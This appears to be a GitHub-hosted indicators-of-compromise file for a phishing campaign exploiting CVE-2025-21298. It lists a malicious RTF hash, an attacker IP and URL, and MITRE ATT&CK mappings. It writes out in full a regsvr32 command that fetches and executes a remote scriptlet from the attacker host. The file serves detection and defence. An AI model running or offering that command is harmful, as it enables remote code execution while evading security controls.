Skip to content

iocs.md

Latest commit

 

History

History
47 lines (28 loc) · 626 Bytes

iocs.md

File metadata and controls

47 lines (28 loc) · 626 Bytes

Indicators of Compromise

File Indicators

File Name: mail.rtf

SHA256: df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184

Network Indicators

IP Address: 84.38.130.118

URL: http://84.38.130.118.com/shell.sct

Command Execution

cmd.exe /c regsvr32.exe /s /u /i:http://84.38.130.118.com/shell.sct scrobj.dll

Vulnerability

CVE-2025-21298

MITRE ATT&CK

Initial Access T1566.001 Phishing Attachment

Execution T1059 Command and Scripting Interpreter

Defense Evasion T1218.010 Regsvr32 Signed Binary Proxy Execution

Command and Control T1071.001 Web Protocols